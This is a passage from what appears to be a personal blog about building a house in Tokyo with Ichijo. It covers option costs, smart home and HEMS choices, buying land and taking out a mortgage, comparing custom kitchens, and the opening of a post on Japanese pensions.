Having grown up in a brick house, I am used to be able to make a hole anywhere in the wall to attach something. However the wooden frames only allow this at every 45 cm (where they have the pillars). If one wants to attach something midway (e.g. TV on the wall, furniture, toilet paper holder), Ichijo needs to include an additional panel behind the wallpaper. This costs extra and also reduces the insulation slightly (an issue with outer walls), so we had to consider it where to add it. Same goes for the ceiling (e.g. for lighting rails or curtains).

Item	Price	Details
Rustic hard maple flooring on the second floor	307,500 yen	We wanted real wood flooring at least in the living room, so got this from Asahi WoodTec
Additional window sashes	225,600 yen	We added a lot of windows to make the living room bright
Stronger walls and ceiling	127,100 yen	So that we can attach stuff anywhere on them. Also made the bottom of the balcony strong for hanging my bike from there.
Magnetic wall in the kitchen	86,000 yen	Added a magnetic board from Mira Tap to the wall in the kitchen, so that we can attach hooks and shelves easily
Extra wallpaper	83,700 yen	For the most part we were happy with the default wallpapers, but added some accent colors here and there, and changed them to water repellent ones in the bathrooms.
Different flooring per floor	30,000 yen	We left the first floor with the basic flooring, so got charged this extra for having different flooring per floor.

Smart home - 661,080 yen

I shared the details of this in an earlier post, so I’ll just list out the options here that are not included in other categories (e.g. air conditioners are smart, but they are already in the equipment upgrade section).

Item	Price	Details
Smart switches	340,780 yen	Panasonic Advanced Series
Ichijo’s Cloud HEMS system	150,000 yen	This includes the smart breaker box, and adapters for the floor heating and EcuCute water heater.
Two outside security cameras	95,600 yen
Intercom upgrade	28,000 yen	To show the camera’s feed when motion is detected, and to connect to the internet.
Connecting the entrance door to the intercom	21,000 yen	And via the intercom to the internet.
Earth wire to the non-smart switches	18,000 yen	There are 3 non-smart switches, and I asked to bring an Earth wire to them in case we want to make them smart in the future.
HEMS adapter for the air circulation system	7,700 yen	Connect the ロスガード９０うるケア to HEMS

Things we didn’t ask for - 597,300 yen

There were some things that we had to pay for due to our land or the shape of the house.

Item	Price	Details
Stronger foundation	298,400 yen	ベタ基礎, one level higher than the basic foundation. This came from the result of our land survey that we could only do after buying the land.
Dropped ceiling	130,000 yen	The ceiling had to be lowered by 20 cm in the kitchen (to cover the pipe from the range hood) and in the kids room (to cover the pipes leaving the bathroom)
Weird shaped roof	79,000 yen	To maximize the size of the solar panel we made the angle of the roof custom, which cost extra.
Sliding door for the entrance	38,100 yen	The shape of our house requires a sliding entrance door, so had to upgrade the normal one.
Strengthen the load-bearing walls	27,000 yen	Some walls on the first floor had to be made stronger to hold up the second floor. This would be more if we had the living room on the first floor.
Snow stoppers on the roof	24,800 yen	On the small roof that doesn’t have solar (as the solar includes these by default).

Lights and electrical stuff - 467,832 yen

We had to get LED lights for one of the subsidies, and we also changed quite a few lights because we didn’t like the design of the default ones. Also we wanted to have more flexibility in the future, so chose replaceable lights, and used rails in the kitchen and dining room.

Item	Price	Details
Lights	219,032 yen	Some from Ichijo’s LED package, some from the makers’ catalogue.
Additional electrical work	165,400 yen	I guess we did too much customization, so they have to work more than what’s included in the base price.
Upgrade ethernet to CAT6A (from CAT5e)	53,400 yen	It’s expensive to upgrade later, so I wanted the best they could do.
One additional ethernet port	30,000 yen	Not sure where, since we added them in all rooms, but some might have been part of the base price.

One thing not mentioned here are the smart switches, as I counted them already at the smart home section.

Storage and laundry poles - 413,700 yen

Most storage is included in the base price (closets in the rooms, at the genkan, around the bathroom sink, etc.), but storage is never enough.

Item	Price	Details
Attic storage / loft	262,500 yen	The overall floor-space of the house is limited to 80% of the land size, but rooms with height up to 140 cm don’t count, so we could add a 9 m2 storage room in the attic.
Under-floor storage, 5 box	103,000 yen	This slides back and forth, increasing the capacity 5-fold compared to a regular storage. It opens from the hallway on the first floor.
Cloth dryer hangers and wires	48,200 yen	Hanger in the bathroom and balcony, wire in the living room and main bedroom.

Solar panel and battery - 1,310,300 yen

This includes a 4.9 kW solar panel and a 7.04 kW battery. The solar panel depends on the size of the roof, and we got the biggest possible for our house. The battery was either this, or double size for an additional 700,000 yen (but the subsidies would have covered 500,000 yen of that), but we decided to stay with the single size.

Summary

All in all, I feel that Ichijo’s default options are pretty generous, and the things we added will increase our wellbeing while living in this house.

Ichijo's smart home options

2025-04-21T00:00:00+00:00

We are building a house in Tokyo with Ichijo 一条工務店. In previous apartments I always had a limited smart home setup, so now that we got to design the whole house, I wanted to consider every available options and add them if they make sense. I’ll review what we ended up adding to our design in this post.

I will share prices in this post, but those of course change with time. For reference: we signed the pre-contract with Ichijo in January 2024, and finalized the design in March 2025. Prices mentioned do not include the consumption tax, but prices on screenshots from the Ichijo catalog do.

HEMS

Smart home is still waiting for a breakthrough, before it becomes an essential element of all homes around the world. Sure, tech-savy people are building amazing things, but we are still far from a plug-and-play solution that provides enough value for the average user. The Japanese government and companies are taking another approach: instead of selling it as a convenience feature, they are selling it as a way to manage energy and save money.

Meet HEMS. From the website of the Ministry of Environment:

HEMS stands for Home Energy Management System. It is a system that supports comfort and energy conservation in the home by displaying energy usage on dedicated monitors, computers, smartphones, and similar devices. It encourages the optimal operation of air conditioning, lighting, and home appliances. The national government has also included the promotion of energy management using HEMS in its policy plans.

As smart devices are made by different manufacturers, interoperability is usually difficult. That’s where HEMS’s government support comes handy: it comes with a standardized protocol, ECHONET Lite, that all device has to support.

ECHONET Lite

ECHONET Lite was developed by the ECHONET Consortium that consist of major Japanese companies making these devices. It is called Lite, as it is a rework of the earlier ECHONET standard, that was too prescriptive (including the physical and data link layers) which prevented its wider adoption.

ECHONET Lite usually works over UDP/IP sending packets to port 3610. The messages are either multicast (e.g. an air conditioner announcing that it has been turned on) or unicast (someone setting the air conditioner to a specific temperature). While other transmission methods like Bluetooth are also supported, all devices I’ve seen use either WiFi or Ethernet.

The protocol doesn’t have any authentication, authorization, or encryption, so anyone on the same network can interact with the devices. This is likely to allow low-power devices to use the protocol. Thus authentication needs to be implemented on a lower layer, e.g. by using a dedicated wifi network that’s firewalled from the rest of the network.

The nice thing is that this protocol is entirely local: even if the device can’t connect to the internet, it can still be controlled by sending it ECHONET Lite messages.

The ECHONET Lite website has a search to check if a specific device received the ECHONET Lite certification. Useful, as sometimes the promotional materials only mention supporting HEMS.

ECHONET Lite also has two integrations with Home Assistant:

https://github.com/scottyphillips/echonetlite_homeassistant - I tried this and works well
https://github.com/banban525/echonetlite2mqtt - I haven’t tried this

Both repositories has recent activities, though the first says that the original author no longer works on this project, but will accept PRs.

Cloud HEMS (クラウドHEMS) - 150,000 yen

This is the main HEMS option from Ichijo, and without this they don’t allow their other HEMS options. This is actually new: for houses that are completed before June 2025, a previous HEMS option was used (that didn’t have the cloud component). The cloud piece means that this integrates with Mitsubishi’s MyMU app, which allows local and remote monitoring and control of the connected devices.

So what can be connected?

EcoEye distribution board (included with the Cloud HEMS option)

EcoEye is a distribution board with per-circuit measurement made by Kawamura Electric. This is the center of home energy management.

I guess the main use of this is to see which devices use a lot of electricity, and then try to run those at an optimal schedule. I originally didn’t plan to add this, but since it is included with the Cloud HEMS, we’ll have it, then see if it ends up being useful.

Floor heating adapter (included with the Cloud HEMS option)

This gets installed on the back of the floor heating control panel and enables per-area temperature control and on/off setting.

I expect that this might be useful as a way to automatically lower the temperature in the living room during the night, or to turn up the heating when we are coming back from a longer trip.

EcoCute water heater adapter (included with the Cloud HEMS option)

This let’s you refill the bath even when you are away (assuming the tub stopper/plug is closed, or if you have a bathtub where it can be operated remotely). It also allows to control the amount of hot water in the tank, and let’s you turn off heating the water while you are away for a few days.

I can see this very useful for times when going on a trip, as it will let us turn on the water heating before we come back.

Moreover it can check the weather forecast for the next day and wait for the free electricity from the solar panels to reheat the water. This is something that I had in mind myself, since we tend to use hot water mainly in the evening, so delaying the reheat until the solar panels are working can likely save quite a bit of electricity. So I’m looking forward to this feature.

The specific features depend on whether Mitsubishi or Chofu Seisakusho made the EcoCute, but the documents I saw weren’t very clear on the difference. We are getting one from Mitsubishi, so I guess it will have most things (since they made the backend as well).

24h ventilation system (ロスガード) adapter (7,700 yen)

This let’s you turn the ventilation system on and off, and switch the mode (e.g. activate night mode). Also to send a push notification when the filter needs to be replaced. It also shows the temperature and humidity of the incoming and outgoing air.

If you have the うるケア version (which includes the central humidifier), then this adapter also enables turning the humidifier on and off.

I expect that we will likely automate turning on the night mode each evening, and might set up something for the humidifier setting too, based on the incoming air’s humidity. Overall looking forward to this, as the ventilation system can be quite noisy at night, so having a way to remotely enable night mode or even turn it off for an hour or so sounds useful.

Air conditioners (included with the ACs)

Air conditioners in general are a great device to connect to any HEMS system. Thus all high-grade and many medium-grade AC options include the WiFi adapter. Based on earlier good experience, we went with Daikin ACs and both their high-grade (AX series), and mid-grade (CX series) had the adapter included. I wanted to get high-grade ACs due to their energy efficiency and how well they work, but the inside unit of Daikin AX is too big, so we decided to go with CX for the kids rooms, and kept the AXs for the main bedroom and the living room.

Alarm system (防犯警報装置器) (not sure)

Ichijo offers a house alarm system that adds opening sensors to all windows, and a central device that makes a loud noise when a window is opened. To open a window without triggering the alarm, one has to turn off the sensor first (by a switch on the sensor).

We decided not to get this system, simply as we didn’t see the point of it. If someone breaks the window, the sensor won’t trigger (as the window frame didn’t open). So for a bulgar to trigger the sensor, they would either need to pick the window lock from the outside (highly unlikely), or we would need to close the window without locking it AND remember to turn on the sensor. This is also highly unlikely. On the other hand, we would likely often forget to de-active the sensor, which could wake the kid(s).

But if someone has the alarm, and adds the HEMS connector, then they will be able to get an intruder alert on their phone, reset the alarm (as the normal system needs you to turn it off on the main unit, until then it keeps making the noise, I believe), and turn the speakers on/off.

Non-HEMS smart options

There are devices that connect to the internet, but are not part of the Cloud HEMS offering.

Panasonic Advanced Series Link Plus switches (350,000 yen for all switches we chose)

I looked into smart lighting and light switches concluding that the best option for us was likely Panasonic’s Advance Series Link Plus, which later I did a deep-dive on, and we decided to add them. In the end, all of our switches are Link Plus, except:

switches in the toilet: for an energy efficiency certification these had to be motion sensors
bath light and air-circulator: the architect recommended a timer switch for the circulator, which comes with a switch for the light built-in, so went with that
switch for the EV charger (as the Link Plus switches can’t handle the amps required)

For the first 2 I asked them to pull an extra earth wire to the switch, so that they might be replaced by Link Plus switches in the future.

These are not part of Ichijo’s HEMS offering, but Panasonic’s hub supports Echonet LITE.

Outside security camera with LAN (47,800 yen)

VL-CX500X-H security camera from Panasonic. I like the small, boxy design. I considered installing cameras myself after we move in, but I didn’t feel like drilling holes into our brand new house, so the convenience of having it installed by Ichijo won. Also this way they take care of the wiring too, both the power and the ethernet.

Intercom upgrade MT91 (28,000 yen)

This changes the intercom to another Panasonic model which will send you a push notification when someone is ringing the bell. However according to this blog the notification takes about 10 seconds, so by the time you respond, the delivery person usually left already.

The reason we got this is that this also enables connectivity with the security camera, and the intercom will show the camera feed when it detects movement. This can act as a pre-notification before someone rings the doorbell, if we are near the intercom. Also the intercom has an SD card slot where the camera recordings can be stored, which is nice too.

E-entry entrance door, interphone plan (60,000 yen for the door, 21,000 yen for the interphone connection)

E-entry entrance door has a radio receiver, so you can keep the key in your pocket and the door can be unlocked with the press of a button (like how many cars work).

Due to the shape of our house, we are getting a sliding entrance door, which only allowed e-entry with the unlock button separate from the handle (別体型). The version that includes the button in the handle can directly connect to the WiFi, but the separate can’t. So we added the interphone plan (ｲﾝﾀｰﾎﾝﾌﾟﾗﾝ), which connects the door to the interphone. Since the interphone is connected to the internet, this means that the door can be opened and closed remotely (useful if someone gets home but forgot their keys). I believe this option required the intercom upgrade to work, or maybe it works without, but then the door can only be opened from the intercom (and not from online).

This feature was important for us, as sometimes we forget something, run back to get it, then wonder if we locked the door or not. With this setup, we will be able to check it remotely and even lock the door if we forgot.

Electric honeycomb shades (10,000 yen per shade)

Ichijo offers honeycomb shades for their windows, and one can upgrade them to be operated by a small motor (instead of manually). These come with IR remote controllers, and no built-in smart functionality, so I plan to add an IR blaster to each room to control these automatically (e.g. lower them when the sun goes down, raise them when the morning alarm goes off).

Miele dishwasher

We are getting a custom kitchen from WoodOne, which will include this large, front-open dishwasher from Miele. This comes with Miele’s own mobile app and also has two HomeAssistant integrations: home-assistant-miele and astrandb/miele.

I don’t yet have any plans on how to use this, but let’s see.

Summary

So these are the smart home options that we decided to add to our house. I will post a follow-up write-up after we moved in and configured all of these, but that will likely be next year.

Buying a land in Tokyo

2025-04-13T00:00:00+00:00

About a year ago we bought a plot of land in western Tokyo in Musashino city (see this post about why we chose this place). In this post I’ll share the process of finding and buying the land, and the associated costs.

Information gathering

We started casually looking about a year before, checking both newly built houses, apartments, as well as visiting model houses and talking with building companies. This was about deciding if we wanted to buy an apartment (マンション), buy a house, or build our own house. Also if the last, then to decide the builder company. This was also the time to look into loans and consider our budget.

We set our budget like this:

60 million yen (6千万円) for the land
30 million yen (3千万円) for the house
10 million yen (1千万円) for fees and the inevitable unexpected costs

Which would bring the overall amount to 100 million yen (1億円), which we intended to take out entirely as loan. In Japan, many banks allow you to take out more than the price of the house, as you are personally liable to pay back the loan. So if you would to default, the bank doesn’t only take the house, they can also take your savings, and other assets.

Looking for land

About 6-9 months before, we decided that we will build our own house. So we told the real estate agent (that we knew from a bar we used to frequent) that we are on the market for a land in our area (or a few stations further out). Then he would often send us some lands by e-mail, and we went to see a few of them together. We were also casually looking at Suumo and Homes to see if anything pops up, and also to get a feel for the price and compromises involved.

In January we decided that we will build with Ichijo and signed the pre-contract with them. This proved to be important, as now we could ask our Ichijo contact to see the lands we were seriously considering and tell us if Ichijo would be able to build on them (they manufacture pieces of the house in a factory and then put them together with a crane, which has to fit next to the land).

Finding the land

In March we found a few lands that we liked, and looked at them in person together with the Ichijo person. We also spent quite a bit of time walking the neighborhoods, and looking up what’s nearby on Google Maps. Also checked as much publicly available information about the land as possible.

Finally we found a land that we really liked, good location, nice neighborhood with all that we wanted and none that we wanted to avoid. Except that it was a bit over-budget at 64.8 million yen (6,480万円). But for the location and size the price was fair, even a bit on the cheaper side due to the shape of the land: while it is a rectangle (so no flag-pole shape), it is narrow and long: about 6 m wide and 20 m long.

Making an offer

We decided to increase our budget and make an offer. Our real estate agent handled the paper work, we just had to tell him the amount. He was really pushing us to make an offer at the listed price as to not loose the land. This is understandable from his point of view, since he has been showing us lands for over half a year, so he was eager to close a deal, but I expected him to help us with the negotiation, especially as it was over budget. But I know that this rarely happens in Tokyo, as real estate agents don’t want to jeopardize their relationship with the other real estate agents (including the seller’s), and the market is often pretty hot, so desirable lands will go quickly.

So I asked the impartial party: our Ichijo contact. He said that while it is not unheard of to get 2-3m yen off, it is more common to ask for a smaller discount.

So we decided to make an offer at 1 million yen below asking price. We had to push the real estate agent to make this offer, but he did it in the end. The seller came back with a counter offer of half million yen off from asking.

At this point it was clear that we will make a deal, and this was just about negotiation. Since the original price ended at 800,000 yen, I suggested to send a counter-counter offer asking for 800,000 yen off, which would round it down to a nice round number (64 million yen). Our real estate agent dig in his heels and said that he really doesn’t recommend doing this, and we should just accept the 500,000 yen discount. I felt that we would loose out on the joy of the negotiation by doing that. I didn’t care about the actual money that much (we are talking about like 0.3% of the overall budget), but I wanted to do it for the fun of it.

In a surprise turn of events the real estate agent asked for a moment to call his manager, then came back with a proposal: they are willing to give us 187,900 yen off from the real estate agent fee (rounding it down to 2 million yen) if we accept the counter offer as-is. This was a win-win for both of us: this would give us some of the additional 300,000 yen that we wanted to ask for, and it would close the deal for the real estate agent. Moreover should we have stayed within our original budget, the real estate agent’s fee (which is 3% of the price plus 60,000 plus tax) would have been about the same they will get after this discount. So we accepted it.

Signing the initial contract

A few days after accepting the counter offer we met with the seller. We signed the initial contract and handed over the deposit (3 million yen in cash).

Sidenote: I learned that the 7-Eleven ATM can dispense this much cash, but only at 500,000 yen batches (as that’s the limit per withdrawal). I called the bank ahead of time to increase the limit (so they were aware of the withdrawals), but I’m surprised that the 7-Eleven staff didn’t even bat an eye of me emptying out half the ATM. Although if I would be running the register at minimal wage, probably I also couldn’t care less.

We signed this initial contract on March 29, and it defined that we will need to finalize everything by mid May. However it gave us the option that if all banks would reject our loan application, then we could walk away without penalty and get the deposit back.

Right before signing the contract, the real estate agent explained the contract details and shared with us bunch of details of the land (including hazard map status, etc.). This is required by law, which I think is a good thing.

One minor thing that we only learned later and bothers me: cities often make very long-term plans about new roads or new parks, and then wait until the houses in the area get old and demolished, and then buy the land. Our land turns out to be part of a planned park, but the plans were made in the ’50s and no progress has been made since then. The real estate agent confirmed with the city hall that they do not intend to pursue these plans, and we will be able to build a house. (Apparently officially cancelling the plan would be complicated, so they just don’t bother.) This came up during the explanation, and the real estate agent told us that there is nothing to worry about. Fast forward to 10 months later and we are finalizing the design of the house. The house builder tells us that normally they would obtain the long-term quality housing (長期優良住宅) certification for our house, but since it is built in an area that has a park planned on it, the certification can not be obtained. Now this is mainly a minor inconvenience (although it does mean that we loose out on some of the solar subsidies), and we would have bought the land even if we knew this ahead of time, but it still bothers me that the real estate agent didn’t know about it.

Looking for a bank

Next step was to look for a bank that would be willing to loan us the money. As the land was more expensive than expected, our overall budget went up to 105 million yen (1億500万円), and we were looking for a loan pre-approval of 1億1,000万円 to give us a bit of flexibility with the house (and to account for unexpected costs).

Ichijo offered to help us with a bank they have relationship with (SMTB, 三井住友信託銀行), so that was one option. But I also wanted to look for banks ourselves, as I thought we can get a better deal.

Our requirements were like this:

110% loan - have the loan cover the various fees as well, not just the price of the land and house
loan that’s compatible with building a house: we needed the money for the land now, and then the money for the house 1-1.5 years later, when the house is ready
variable rate loan, preferably with a rate tied to some deterministic metric. Big banks usually tie it to their short-term prime lending rate (短期プライムレート), while netbanks just make up the number, so they could increase it at will.

This proved to be more tricky than expected.

We considered Sony bank and PayPay bank, as they had very good rates, however they both would only give us the money when the house is ready, which wouldn’t work for us. We also checked Prestia, however they would only do up-to 100% loans.

Banks that we actually applied:

MUFG: they said they only do land-house split loans if it’s less than 1 year between the two (which was impossible with Ichijo). They actually called us to tell this, and recommended that we should ask the house builder’s partner bank.
SMBC: we applied through the real estate agent (as he had a partnership with this bank). Even though we applied for 110 million yen, the pre-approval came back with 100 million yen, and the bank told us that for our case they won’t give us more. We couldn’t get more details on whether the location, builder, my income, or the 110% was the issue
SMTB: the bank that Ichijo had a partnership with. They fit all of our criteria, and (likely thanks to Ichijo) we passed their screening easily. So we ended up going with them

We thought that between the initial contract of the land to closing on it, we will have plenty of time. However banks work really slowly, and the process has multiple steps (pre-screening, then main screening with the bank potentially asking for additional documents), so we didn’t have that much time. Moreover as the loan is for a house you live in, the banks want to know which company will build the house and how much it will cost (of course this can change as the house is finalized, but they need a number). So I highly recommend deciding the house builder company before this step.

Details of the loan

We got a variable rate loan at 0.32% (this included a discount due to Ichijo’s partnership, a discount for high quality house (ZEH), and a discount for agreeing to invest 50,000 yen monthly into one of their funds - they have an S&P500 fund with low fee).

Since then the rate has gone up to 0.47% (at the end of 2024), and it is expected to increase once more soon to mirror the interest rate hikes by the Bank of Japan.

The length of the loan is the standard 35 years, with the option to pre-pay at anytime for free (there is a minor administrative fee if prepaying the full amount). At prepayment one can choose to either reduce the remaining length or reduce the monthly payments going forward (some banks will only allow one of these, but SMTB allows both).

Moreover SMTB allowed us to only pay the interest for the first year (to reduce the burden of paying the mortgage for the land, while we are still paying rent at the same time). We took advantage of this. However this means that the loan of the land will need to be paid back in 34 years, so the monthly payments will be slightly higher (however at less than 1% rates, it is much better to invest the money and drag out paying back the mortgage as long as possible).

The mortgage is technically split into two, mostly separate loans, one for the house and one for the land. They had to come from the same bank (as otherwise in case of a default multiple banks would have claims on the property), but otherwise they are treated as two separate loans (separate start and end date, possibly different options e.g. I believe one could be variable rate while the other fixed).

Guarantor fee

There is an additional fee that one has to pay the bank, often called the guarantor fee (保証取扱手数料) or insurance fee. SMTB (and many other banks) offered two option for this:

a 2.2% fee of the loan amount paid at the time of taking out the loan, or
33,000 yen fee at the time of taking out the loan, but interest rate goes up by 0.25%

SMTB allowed rolling the 2.2% fee into the loan itself, so it became a math question: which is better? It depends on a few factors:

if one pays the mortgage for the full 35 years, then the 2.2% fee is likely better
if one sells the house after a few years and pre-pays the mortgage in full, then the higher interest rate is better (as in those few years it cost less than the one-time 2.2% fee).

The break even between the two is somewhere around 10 years (if I remember correctly, but I don’t have my calculations anymore).

Moreover if the interest rate would go up a lot, then the 0.25% higher interest rate can come out ahead, as the additional principal of the 2.2% fee would incur high interest, while e.g. the difference between 10% or 10.25% interest is not that much. However this only kicks in at truly high interest rates (I think over 10%).

So we decided to go with the 2.2% initial fee.

Btw this (or the loan in general? not sure) included a basic life insurance for me: if I die, then the rest of the mortgage disappears and my family gets the house. The bank tried to sell me additional insurance (e.g. if I get a deadly disease, they would immediately pause the monthly payments, or if I get cancer, it would cancel out half or the full loan amount, regardless if I recover or not), but I didn’t find them a good deal. They mostly dealt with near-terminal illnesses, and with the default life insurance their values seemed to be limited to a few years. Instead I’ll get a normal life insurance from another insurance provider in addition to the default one that came with the loan.

Closing on the land

In mid May we went to the bank. First I opened a bank account, and signed the contracts for the loan. Then the seller, the real estate agent, and a scrivener (sort of like a lawyer, but deals mainly with paperwork) joined, and we signed the final contract of the land. Then I signed the money transfer request, which the bank executed immediately. All 3 parties checked with their bank and confirmed that they received the money.

The amounts I paid at this time:

61,3 million yen (6,130万円) - remaining money for the land (price: 6,430万円 minus the 300万円 we already paid)
2 million yen (200万円) - real estate agency fee. Normally: 3% of the price + 60,000 plus 10% tax, which would have been 2,187,900 yen, but we got the discount
1,507,000 yen (150.7万円) - loan fee / guarantor fee (2.2% of the loan amount)
748,500円 - land ownership change registration fee. This went to the scrivener who handled the paperwork. This included both the registration fee and the fee of the scrivener (which is set by the law)
126,612円 - our portion of this year’s property tax. The seller already paid this in January, so they did a per-day breakdown of what portion of the year we will own the land, and we paid them the tax proportionally to that. The land was empty in January, so this was for an empty lot. With the house it should be a bit lower, I believe, but we shall see

All-in-all, buying the land cost us 68,682,112 yen (6,868万円), even though the price of the land was only 64,300,000 yen (6,430万円). This puts all the fees combined at 6.8% of the price of the land, which is inline with what I read online.

There you have it, our journey of buying a land in Tokyo. After this, we started the long process of designing our house, but that’s a story for another post.

Cost breakdown

The final cost breakdown of buying the land was this:

Custom kitchen with Ichijo

2025-04-12T00:00:00+00:00

We are building a house in Tokyo with Ichijo 一条工務店. They are known to provide outstanding cost-performance (especially in insulation), but a lack of customization options. One place where this caused us extra work was the kitchen, and I’ll share our journey in this post.

I will share prices in this post, but those of course change with time. For reference: we signed the pre-contract with Ichijo in January 2024, and talked with the kitchen companies from the summer of 2024, signing the final contract for the selected kitchen in March 2025.

Our requirements

Both my wife and I like cooking, so kitchen is one of the places in the house where we spend quite a bit of time. So making sure it meets our needs and desires was important from the beginning. Our initial requirements can be summarized as this:

front-open, big dishwasher - Japanese homes still often don’t have dishwasher or only a small one
IH stove - since we’ll have solar on the house, we decided to make our home electricity-only (オール電化)
separate tap for purified water - the water filter is often included in the main tap, and one needs to press a button to switch between normal or purified water. However we have this type now, and we often forget to switch
a balance of plenty of storage but an open feel - no overhead storage in the middle of the room
space for all of our appliances (coffee maker, rice cooker, kettle) and two microwaves (both have oven functionality, and often times when we bake in one, we use the other one for heating up leftovers, or baby food)

Other than the front-open dishwasher, these were pretty standard and doable with many options. However the dishwasher turned out to be the challenge.

Dishwasher options

Option 1: Panasonic from Ichijo

Ichijo offers multiple house lineups, which affect the available options. We went with one of their higher end option, GRAND SMART, which just recently introduced the option to have a front-open dishwasher (from Panasonic) in their Grace Kitchen option (they offer other kitchen designs, but those don’t have the front-open dishwasher option):

So this was one possibility, although as this was only available in a single size of the Grace Kitchen, it would have limited our choice. Moreover this is the first model of front open dishwasher that Panasonic has ever made, and when we saw it in person, it really had that first-gen feeling: the shelves were a bit wobbly, and overall it didn’t feel like it will last. (This could have been due to the machine being in a showroom where people open it much more than in normal use, but this was Panasonic’s own showroom, so I would expect them to fix/replace it if it is broken/worn out.)

Option 2: add it later

One unofficial option that Ichijo offers is that they are willing to leave the dishwasher’s space empty, and you can install your own dishwasher later. This blog has the costs from 2021. Based on this we would have roughly the following costs:

Buying the dishwasher. We found a Miele that we liked that had a list price of ¥517,000
Fee of installing the dishwasher. The blog said ¥50,000, but likely a bit higher due to inflation
Fee to Ichijo to prepare the pipes and electricity connections. The blog said ¥31,260, but again, likely higher now

Still, this is likely a good option for people who are happy with Ichijo’s kitchen design and just want a custom dishwasher.

Option 3: fully custom kitchen

Ichijo also lets you skip their kitchen, and get the kitchen from another company. They have a relationship with many kitchen makers, so you can get a discount from the list price, and Ichijo will also give back some money for cancelling their kitchen (which is included in the price of the house), however Ichijo will charge some extra for installing the kitchen. Compared to adding it later, this has the benefit that Ichijo will install the full kitchen. We ended up going with this option.

Custom kitchens

There are many companies making custom kitchens, and we got estimates from a few of them. Since we did these while we were still finalizing the layout, the size of the kitchen changed between these, so direct comparison is not perfect.

LIXIL

The first company we talked to was LIXIL. At this point our layout would have worked best with an L shape kitchen. Once we told that we wanted the front-open Miele dishwasher, they immediately recommended us their highest lineup (as otherwise there would be a gap at the bottom, which would look bad).

With Miele dishwasher, Panasonic IH stove, and stainless steel counter-top this came out to be 3,643,500 yen at list price.　With Ichijo’s discount this price went down to 2,883,500 yen (although it wasn’t clear if we would have to pay the installation fee on top of this, or if that was already included).

Panasonic

Next we visited Panasonic’s showroom. Since we were disappointed in their front-open dishwasher (and they only use Panasonic equipment), we sort of ruled them out almost immediately. Their estimate for a kitchen very similar to LIXIL’s above came in at 3,494,500 yen after the Ichijo discounts.

Takara Standard

The next company was Takara Standard. Their appeal should be that they offer less fancy options than LIXIL for a cheaper price. We can confirm both, as the only color option we liked was from their highest tier, and they indeed ended up being cheaper than LIXIL. Also they make the shelves and drawers from steel, so magnetic dividers, hooks, etc. can be attached everywhere. (They do this likely to lower the price, but I really liked it for the flexibility of attaching things to it.)

Their estimate came in at ¥2,479,300 on list price, which went down to 2,049,600 after the Ichijo discount.

WoodOne

We weren’t really happy with either of the above options: they felt overpriced and didn’t like that they all pushed us towards their most expensive lineup by pulling weird tricks like making the bottom have a gap that looks really bad with the front-open dishwasher. Also the pricing felt really arbitrary (which wasn’t helped by the fact that they all sent their quotes to Ichijo only, and we had to ask our Ichijo contact to share them with us).

Then my wife found WoodOne: this is a company that focuses on the wooden part of the products they offer: they will add the equipment, but since their focus is the body of the furniture, they have better design (at least for us) and much clearer pricing: for each equipment they list its price in their catalog, and that’s it. This also allowed us to compare multiple options for the IH, and kitchen hood.

This comparison let us upgrade the IH stove from the standard Panasonic one (that we chose with the other makers) to a Gaggenau one. To me this feels that it was designed by people who actually cook a lot, unlike other makers that seem to be content with the status quo. (The only reason most IH stove look like they do is that they are modelled after gas stoves. Gaggenau on the other hand gives you the whole surface with much more control options.)

In the end this was the kitchen that we went with from WoodOne (the layout meanwhile changed, so instead of an L shape we got an I shape peninsula type kitchen):

Their list price came out to 1,983,300 yen, which went down to 1,264,500 yen after the Ichijo discount. This includes the installation fee and the original kitchen’s cancellation refund too. (This was the actual price we ended up paying in the end.)

Price summary

So let’s compare the price. For Ichijo, I added the following options (as we made similar choices with the other makers, and we would have added these options if we go with Ichijo’s kitchen):

water purifier: ¥107,000
upgraded IH stove: ¥72,600
Panasonic front-open dishwasher: ¥275,000

Maker	List price	Discounted price
Ichijo with Panasonic front-open	454,600 yen	454,600 yen
Ichijo with bring-your-own Miele	777,860 yen	777,860 yen
LIXIL	3,643,500 yen	2,883,500 yen
Panasonic	no information as they only sent the quote to Ichijo	3,494,500 yen
Takara Standard	2,479,300 yen	2,049,600 yen
WoodOne	1,983,300 yen	1,264,500 yen

Cupboard

Moreover, we also wanted to have a cupboard in the kitchen, which is a paid option from Ichijo:

While it would be possible to get the cupboard and the kitchen from different companies, they are placed close to each other, so having them in different design won’t look good. So we decided to get them from the same company as the kitchen, so for the full comparison, let’s add them too.

The cupboard options:

Maker	List price	Price after discount and with installation fee
Ichijo (180cm wide Grace Cupboard)	354,200 yen	354,200 yen
LIXIL (183 cm wide)	839,500 yen	860,000 yen
Panasonic	no information as they only sent the quote to Ichijo	1,197,000 yen
Takara Standard (180 cm wide)	550,400 yen	550,400 yen
WoodOne (229 cm wide, without overhead storage)	503,600 yen	595,000 yen

Talk about a spread! From 354,200 yen to more than triple that at 1,197,000 yen.

Comparison

So let’s compare all options, their prices, and anything that sets them apart.

Option	Price	Comment
Ichijo with Panasonic front-open	808,800 yen	The dishwasher would be Panasonic, which we didn’t like that much. Also the design is meh.
Ichijo with bring-your-own Miele	1,132,060 yen	The design is meh, installation is an extra step (another company has to do it), and the price is likely higher (we used numbers from 2021)
LIXIL	3,743,500 yen	This was for the L shape, so the I shape without overhead storage would be cheaper.
Panasonic	4,691,500 yen	The dishwasher is Panasonic. The price would be less due to the smaller size.
Takara Standard	2,600,000 yen	The price would be less due to the smaller size.
WoodOne	1,859,500 yen	No overhead storage on either the kitchen or the cupboard. Real wood front (pine) and cupboard top (oak). Gaggenau IH.

Decision

We have friends who built with Ichijo and went with one of the first 2 options, and those are very reasonable decisions. However we really didn’t like Ichijo’s design, and enjoyed working with WoodOne, so we decided to go with them. I’ll share photos and our experience once we move in.

Pension in Japan

2025-04-11T00:00:00+00:00

I’m still pretty far from retirement, but recently I’ve been looking into how the pension works in Japan, so I’ll share my learnings in this post.

There are multiple sources of pension payments one can receive in Japan, I’ll cover the ones that I found relevant for my situation as a full time company employee.

Public pensions

As a company employee I’m paying (and thus eligible to receive) two types of public pension.

National Pension, 国民年金

This is mandatory for everybody between the age of 20 and 59 living in Japan. For people who need to pay this for themselves, it costs 16,980 yen/month (regardless of the income), but for full time employees this is included in the Employee’s Pension (see below). (source)

